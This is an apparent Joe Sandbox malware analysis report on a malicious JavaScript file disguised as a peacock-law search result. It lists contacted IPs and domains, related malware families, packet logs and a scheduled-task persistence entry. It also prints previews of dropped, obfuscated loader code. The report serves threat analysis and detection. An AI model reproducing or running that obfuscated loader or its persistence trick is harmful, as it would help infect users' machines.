                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.jswscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://momentjs.com/wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.jswscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.jswscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                104.21.67.130
                		ellinikiaktoploia.netUnited States
                		13335CLOUDFLARENETUSfalse
                109.237.132.6
                		www.shamara.deGermany
                		45012CLOUDPITDEfalse
                188.114.96.3
                		ipacrack.comEuropean Union
                		13335CLOUDFLARENETUSfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1500124
                Start date and time:2024-08-27 22:50:03 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 22s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:is it legal to kill a peacock in california 93889.js
                Detection:MAL
                Classification:mal72.troj.expl.evad.winJS@13/9@3/3
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .js

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: is it legal to kill a peacock in california 93889.js

                Simulations

                Behavior and APIs

                TimeTypeDescription
                16:52:05API Interceptor1393x Sleep call for process: powershell.exe modified
                22:51:32Task SchedulerRun new task: Security Lighting path: wscript s>BALANC~1.JS

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                188.114.96.3PO_112234525626823775.jsGet hashmaliciousLokibotBrowse
                • werdotx.shop/Devil/PWS/fre.php
                nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                • web.ad87h92j.com/4/t.bmp
                pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
                • web.ad87h92j.com/4/t.bmp
                QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                • filetransfer.io/data-package/0U9QqTZ6/download
                FedEx Shipping Document.scr.exeGet hashmaliciousAzorultBrowse
                • l0h5.shop/CM341/index.php
                Quote 1T PN40 082624.exeGet hashmaliciousFormBookBrowse
                • www.lampgm.pro/em9t/
                weave.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                steam_module_x64.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                http://y8oj.tonetrau.comGet hashmaliciousUnknownBrowse
                • y8oj.tonetrau.com/
                Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                • qegyhig.com/login.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • 188.114.97.3
                http://ketoryyby.cloudGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                https://www.gxtfinance.com/english.phpGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • 188.114.97.3
                x64_x32_installer__v4.4.9.msiGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                DOC-71275297.pdfGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • 188.114.96.3
                https://2n8w.app.link/?~channel=Email&~feature=ConfirmationEmail--BenerailETicket&~campaign=WebToApp&~tags=locale%3Dnl_NL&~tags=version%3D1&~tags=marketing_code%3DBSH3675&$android_url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.thetrainline%26hl%3Dnl-NL&$android_deepview=false&$android_passive_deepview=false&$ios_url=https%3A%2F%2Fitunes.apple.com%2FNL%2Fapp%2Fthetrainline%2Fid334235181&$ios_deepview=false&$ios_passive_deepview=false&$fallback_url=//pub-f6244fe9c7374698a595b626f3787308.r2.dev/serverDCCCCCCC.html#mhebert@vib.techGet hashmaliciousHTMLPhisherBrowse
                • 104.18.2.35
                CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • 188.114.97.3
                http://ketoryyby.cloudGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                https://www.gxtfinance.com/english.phpGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • 188.114.97.3
                x64_x32_installer__v4.4.9.msiGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                DOC-71275297.pdfGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaC, VidarBrowse
                • 188.114.96.3
                https://2n8w.app.link/?~channel=Email&~feature=ConfirmationEmail--BenerailETicket&~campaign=WebToApp&~tags=locale%3Dnl_NL&~tags=version%3D1&~tags=marketing_code%3DBSH3675&$android_url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.thetrainline%26hl%3Dnl-NL&$android_deepview=false&$android_passive_deepview=false&$ios_url=https%3A%2F%2Fitunes.apple.com%2FNL%2Fapp%2Fthetrainline%2Fid334235181&$ios_deepview=false&$ios_passive_deepview=false&$fallback_url=//pub-f6244fe9c7374698a595b626f3787308.r2.dev/serverDCCCCCCC.html#mhebert@vib.techGet hashmaliciousHTMLPhisherBrowse
                • 104.18.2.35
                CLOUDPITDEPO TIYEY078K.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 91.203.110.247
                PO AFHOR9301604.exeGet hashmaliciousFormBookBrowse
                • 91.203.110.247
                Quote - V-24-TOS-082.exeGet hashmaliciousFormBookBrowse
                • 91.203.110.247
                AED 47,000.exeGet hashmaliciousFormBookBrowse
                • 91.203.110.247
                aspnet80.exeGet hashmaliciousUnknownBrowse
                • 91.203.110.206
                aspweb.exeGet hashmaliciousSalityBrowse
                • 91.203.110.206
                aspweb88.exeGet hashmaliciousUnknownBrowse
                • 91.203.110.206
                PO JAN 2024.exeGet hashmaliciousFormBookBrowse
                • 91.203.110.247
                file.exeGet hashmaliciousFormBookBrowse
                • 109.237.134.46
                file.exeGet hashmaliciousSystemBCBrowse
                • 185.137.168.190

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0ehttps://2n8w.app.link/?~channel=Email&~feature=ConfirmationEmail--BenerailETicket&~campaign=WebToApp&~tags=locale%3Dnl_NL&~tags=version%3D1&~tags=marketing_code%3DBSH3675&$android_url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.thetrainline%26hl%3Dnl-NL&$android_deepview=false&$android_passive_deepview=false&$ios_url=https%3A%2F%2Fitunes.apple.com%2FNL%2Fapp%2Fthetrainline%2Fid334235181&$ios_deepview=false&$ios_passive_deepview=false&$fallback_url=//pub-f6244fe9c7374698a595b626f3787308.r2.dev/serverDCCCCCCC.html#mhebert@vib.techGet hashmaliciousHTMLPhisherBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3
                obvious.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3
                http://email.e.quickshipping.com/c/eJxszLFSxCAQgOGnId1lYHchWFDY5D042JOdXGJkg45v72ht-88_X03gYiw8cXILUIjBeze1RKEwBLTBu5CDj2gBGWPMD-I7P9wkCSyQjRCcRwKcq1uWSEzW40spdTFkef4YUjZtcp5yvM3lfZ-eqV3XqQZfDawG1jtv0ud8ZeUmfc8b99_PwPp13uQoz1FZDaydq3QulwHUPatmQ3a079vQP7an_-pngp8AAAD__zWIRVUGet hashmaliciousUnknownBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3
                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3
                Statement of Account.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3
                Madisonwellsmedia546.pdfGet hashmaliciousUnknownBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3
                file.exeGet hashmaliciousRHADAMANTHYS, XWormBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3
                instruction_3.pdf lnk.lnkGet hashmaliciousLummaCBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3
                ATT09876.htmGet hashmaliciousHTMLPhisherBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3
                FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 104.21.67.130
                • 109.237.132.6
                • 188.114.96.3

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):19604
                Entropy (8bit):5.009171660142711
                Encrypted:false
                SSDEEP:384:Wrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQfdjes+YW+OdBANXp5eYoaYpib47:WLmV3IpNBQkj2Uh4iUxDhEdCs+YW+Od1
                MD5:CB7B7AAE0A74AC0D6190B9CFA61C9A20
                SHA1:36B17899ED6FB1CA25DBEAB456003B54AA125FF9
                SHA-256:830DB3443E72BD355AD6EF99987DD20D7793EA406E0F4A78FE2AAE5B9353B122
                SHA-512:FC43BE983B3CBB7C3760F526379501A06B90AA1523042DB46F3367A25D335FF7A57FECDFAEAF9CF4BD6BCEBB0306887175286E18EA0F8D1E5DCCEF4BC5365300
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kjv115d.kal.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4piv51b.s4m.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjkzvefq.kmv.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nchiupsg.fke.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxxrwmnz.m5k.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sv5chdui.cd3.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Roaming\Microsoft\Balance Training.js (copy)

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):44131560
                Entropy (8bit):5.660561296891204
                Encrypted:false
                SSDEEP:3072:vOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtG:X
                MD5:04C043B7B5F13C4CF23B63FC7BA1BEA2
                SHA1:B846E889513103BEA0CAC649448F0E874453C6E5
                SHA-256:692EFF0C8195A14B5691713E51DB78AF1B1D81C00DD697B960D84B73EC75AA19
                SHA-512:4598F5F9A2CBFE88091B1E34BD2432849AB3E000488E74AA04623876836ECDB39AB6987D07CA23679F82A63778B1AC314FF6DCA26F0FD040422F302A91B9DEB2
                Malicious:false
                Preview:6528319183647454384857531030373448940060424911;function prettyk(one0, wlnww, afraidx, seemv, xoeth) {if (afraidx % (pitchi-steadr)) return (one0+wlnww); else return (wlnww+one0);}readn = 1;result1='/(?s/?.M:FM$??A;+)i\\?\"n+';function scorew(iron5, yhii, ygrqb, cookd){blue6=they5(valueg(matchg),qxjyq);broughtj[43679] = less1;}die1='dSs+lI|(r\\w\"o?h?wiE+d???n)+(a+? ';function hfhcn(cduzl) {jwvk8='length';return cduzl[jwvk8];}caught0 = 28827;especially81='S?]1\\[\"/(s?e3Y+m-S?o2t(';steadr = readn;alwaysp='a+()b())??|o+l%s??{Y/)in/';represent8='?k^- =? )(+h\"?\\t?\\/\\\"g\\\\t\\+nes(en?g??)w++';cityq='t\\r\"c(|+?2W\\+\"h6?nE+eoR4?i?2+\\+\"?,?';function worldf(){ladye2(flat0);path3 = valueg;while(readn){character9++;try{drsntw=(broughtj[character9](character9));}catch(please5){madea=19869;broughtj[madea]=avvy;madea=madea;}}}function they5(qlyo, choosel, usual1, simplez, designw) {reals = hfhcn(choosel);for (right2 = (threev); right2<=hfhcn(qlyo)-reals; right2++) {if (consonant7(qlyo,right

                C:\Users\user\AppData\Roaming\Microsoft\Insurance Negotiations.dat

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):44131560
                Entropy (8bit):5.660561296891204
                Encrypted:false
                SSDEEP:3072:vOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtOtG:X
                MD5:04C043B7B5F13C4CF23B63FC7BA1BEA2
                SHA1:B846E889513103BEA0CAC649448F0E874453C6E5
                SHA-256:692EFF0C8195A14B5691713E51DB78AF1B1D81C00DD697B960D84B73EC75AA19
                SHA-512:4598F5F9A2CBFE88091B1E34BD2432849AB3E000488E74AA04623876836ECDB39AB6987D07CA23679F82A63778B1AC314FF6DCA26F0FD040422F302A91B9DEB2
                Malicious:false
                Preview:6528319183647454384857531030373448940060424911;function prettyk(one0, wlnww, afraidx, seemv, xoeth) {if (afraidx % (pitchi-steadr)) return (one0+wlnww); else return (wlnww+one0);}readn = 1;result1='/(?s/?.M:FM$??A;+)i\\?\"n+';function scorew(iron5, yhii, ygrqb, cookd){blue6=they5(valueg(matchg),qxjyq);broughtj[43679] = less1;}die1='dSs+lI|(r\\w\"o?h?wiE+d???n)+(a+? ';function hfhcn(cduzl) {jwvk8='length';return cduzl[jwvk8];}caught0 = 28827;especially81='S?]1\\[\"/(s?e3Y+m-S?o2t(';steadr = readn;alwaysp='a+()b())??|o+l%s??{Y/)in/';represent8='?k^- =? )(+h\"?\\t?\\/\\\"g\\\\t\\+nes(en?g??)w++';cityq='t\\r\"c(|+?2W\\+\"h6?nE+eoR4?i?2+\\+\"?,?';function worldf(){ladye2(flat0);path3 = valueg;while(readn){character9++;try{drsntw=(broughtj[character9](character9));}catch(please5){madea=19869;broughtj[madea]=avvy;madea=madea;}}}function they5(qlyo, choosel, usual1, simplez, designw) {reals = hfhcn(choosel);for (right2 = (threev); right2<=hfhcn(qlyo)-reals; right2++) {if (consonant7(qlyo,right

                Static File Info

                General

                File type:ASCII text
                Entropy (8bit):4.596528651735499
                TrID:
                  File name:is it legal to kill a peacock in california 93889.js
                  File size:30'348'243 bytes
                  MD5:42ffe54cde30c6d3babb008f491597ad
                  SHA1:7bdbe6b90df3e48cadbd494f0d2ff24fc32b287d
                  SHA256:5bf0940ddb8bc56d5322f879b64c0565f66a3ed6bf4dbdadc3e5f01236e08e52
                  SHA512:71effe8015dbfffb087845974dd2425e1b856dd728a6324fd4b1f9c085d3cb90c435a9cc63da0c479bdf87903d1fd0f1a3afe29a1582445f1682db702b60821c
                  SSDEEP:49152:57BkzjCxbgqHlp4qhuN08khlGhxz4YzYBmMI+8WQm3L3/uMcGCgD3qug5FgZcE47:q
                  TLSH:1767A20DAEF71091A923317C8FAF640AB6748017190ADD143D8DA3945FA953867FEFE8
                  File Content Preview:./*.* Licensed to the Apache Software Foundation (ASF) under one.* or more contributor license agreements. See the NOTICE file.* distributed with this work for additional information.* regarding copyright ownership. The ASF licenses this file.* to you u

                  File Icon

                  Icon Hash:68d69b8bb6aa9a86

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Aug 27, 2024 22:52:09.552805901 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:09.552865028 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:09.553004026 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:09.559386015 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:09.559431076 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:10.908011913 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:10.908087969 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:10.910036087 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:10.910058022 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:10.910300016 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:10.964732885 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:11.047399998 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:11.047442913 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.529377937 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.529827118 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.529834986 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.529860020 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.529931068 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:11.529962063 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.529978991 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:11.589821100 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:11.619856119 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.619864941 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.619962931 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.620188951 CEST49713443192.168.2.5109.237.132.6
                  Aug 27, 2024 22:52:11.620704889 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.620711088 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.620743990 CEST44349713109.237.132.6192.168.2.5
                  Aug 27, 2024 22:52:11.620773077 CEST49713443192.168.2.5109.237.132.6
